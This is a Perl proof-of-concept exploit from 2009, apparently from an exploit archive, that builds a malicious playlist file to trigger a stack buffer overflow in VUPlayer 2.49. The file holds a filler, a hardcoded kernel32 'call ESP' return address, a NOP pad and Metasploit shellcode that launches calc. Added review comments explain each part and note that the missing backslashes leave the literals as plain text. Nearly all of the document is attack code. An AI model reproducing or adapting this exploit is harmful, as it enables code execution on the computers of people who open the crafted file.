# Title : VUPlayer 2.49 (.wax File) Local Buffer Overflow Exploit
# Published : 2009-01-05
# Author : Houssamix
#!/usr/bin/perl -w
# Author : Houssamix
# Download : http://vuplayer.com/files/vuplayersetup.exe
# tested in windows pro Sp 2 (french)
# -- Viva Gazza -- Viva Palestine --
# Proof-of-concept generator: writes a playlist file whose single oversized
# entry overruns a buffer in VUPlayer 2.49's playlist handling (the banner
# below lists .wax, .m3u and .pls as affected).
#
# NOTE(review): every literal in this listing appears without backslashes
# ("x41", "x90", " n"). That looks like an artifact of how the page was
# extracted; as printed, Perl treats these as plain text, so the banner ends
# in a literal " n" and the output file holds ASCII text, not raw bytes.

# Console banner only; nothing here affects the generated file.
print "===================================================================== n";
print "Author : Houssamix n";
print "===================================================================== n";
print "VUPlayer v2.49 ( .wax file ) Local buffer overflow Exploit n";
print "file can be exploited : (.wax)(.m3u)(.pls) n";
print "===================================================================== nn";
# Filler repeated 1012 times; presumably the distance from the start of the
# vulnerable buffer to the saved return address -- not verifiable from here.
my $overflow = "x41" x 1012;
# Four-byte value placed directly after the filler, written in little-endian
# order (5D 38 82 7C <-> 0x7C82385D). It is a fixed address inside a system DLL,
# so the PoC is tied to the one OS build/language named in the header comment;
# ASLR relocates the module and breaks it, and DEP blocks running code from the
# stack region this instruction would jump to.
my $ret = "x5Dx38x82x7C"; #call ESP from kernel32.dll 0x7C82385D
# Four 0x90 padding bytes between the overwritten address and the payload.
my $nop = "x90" x 4;
# Payload, per the author's note below: Metasploit-generated, launches calc as
# a visible demonstration. Ten rows of 16 values match the stated Size=160.
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
"x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
"x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
"x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
"x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
"x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
"x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
"x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
"x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
"x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";
# Output name; note the title says .wax but the file written is .m3u.
my $file="hsmx.m3u";
# Final layout: filler | overwritten address | padding | payload.
# $exploit has no `my`, so it is a package global (the script has no `use strict`).
# Detection note: a single playlist entry of well over a thousand characters
# with no newline or path structure is anomalous and can be flagged by content filters.
$exploit = $overflow.$ret.$nop.$shellcode;
# Two-argument open in append mode (">>"): running the script again adds a
# second copy of the data to an existing hsmx.m3u instead of replacing it.
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created open it with vuplayer 2.49n";